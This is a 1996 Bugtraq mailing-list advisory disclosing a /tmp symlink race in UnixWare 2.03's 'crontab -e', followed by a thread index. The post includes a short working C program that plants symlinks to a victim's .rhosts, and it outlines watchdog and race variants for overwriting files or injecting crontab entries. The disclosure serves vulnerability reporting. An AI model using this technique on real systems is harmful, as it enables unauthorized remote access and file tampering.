Bugtraq mailing list archives
HOLE: Unixware 2.03: crontab -e
From: Hannu.Laurila () japo fi (Hannu Laurila)
Date: Thu, 29 Aug 1996 18:41:12 +0300
Novell UnixWare 2.03 (UNIX System V Release 4.2 MP): There seems to be a little security problem with Unixware's crontab-command. I haven't been able to check if this applies to other versions than 2.03. 'crontab -e' command creates a temporary file in /tmp to pass the crontab file for editing with a text editor. The name of the file is easily guessable and it seems to be based on process ID (e.g. /tmp/crontaba00421). 'crontab -e' doesn't check if the file already exists in /tmp and will gladly follow any symbolic links there might be waiting. A malicious user can create a bunch of symbolic links in /tmp with a little C program, if he knows that someone is going to edit his/her crontab file. The code might be something like this: #include <stdio.h> #include <unistd.h> char *foo="0123456789ABCDEF"; int main ( void ) { char *ps1, *ps2, s[32]; for (ps1=foo;*ps1;ps1++) for (ps2=foo;*ps2;ps2++) { sprintf(s,"/tmp/crontaba002%c%c",*ps1,*ps2); symlink("/home/joe/.rhosts",s); } } Now when joe edit his crontab file, it will be saved as .rhosts in his home directory. This is dangerous, because crontab files often include nice characters like '*' which act as a wildcard in .rhosts. The user doesn't have to be joe. A malicious user might build a watchdog which replaces the symbolic link with a new (e.g. /home/sam/.rhosts) while user is editing his crontab file (a watchdog which seeks for processes like 'crontab -e' and 'pico /tmp/crontab*' By replacing the symbolic link while user is editing the crontab file, a malicious user might also be able to overwrite any file owned by the user. I haven't checked but I think that there is also a little race condition possibility when user exits his editor (and saves the file) and before crontab reads the saved file. If the symbolic link can be replaced with a new in that period of time, a malicious user might be able to add entries to user's crontab file. I haven't checked if this applies to root also. --- Hannu Laurila - kube () japo fi * Kauppakatu 10, FIN-62900 ALAJÄRVI Alajärven Puhelinosuuskunta * Tel +358 66 557 2209 - Fax +358 66 557 2788
Current thread:
- Re: Tired of /tmp? Here's a proposed solution, (continued)
- Re: Tired of /tmp? Here's a proposed solution Thomas Koenig (Aug 28)
- Re: Tired of /tmp? Here's a proposed solution Sean B. Hamor (Aug 28)
- Re: Tired of /tmp? Here's a proposed solution mdr () vodka sse att com (Aug 28)
- Rlogin vulnerabilty Gabriele Avosani (Aug 28)
- Re: Tired of /tmp? Here's a proposed solution Matthew J Brown (Aug 28)
- ftpbounce-0.1.tar.gz Rune Braathen (Aug 27)
- Re: [BUG] Vulnerability in PINE Rage-303.tr (Aug 27)
- Re: [BUG] Vulnerability in PINE Linux Mailing Lists (Aug 28)
- Re: [BUG] Vulnerability in PINE Sean B. Hamor (Aug 28)
- Re: [BUG] Vulnerability in PINE Jason Haar (Aug 29)
- HOLE: Unixware 2.03: crontab -e Hannu Laurila (Aug 29)
- Solaris 2.5* ACLs and /dev/kmem access Vic Abell (Aug 28)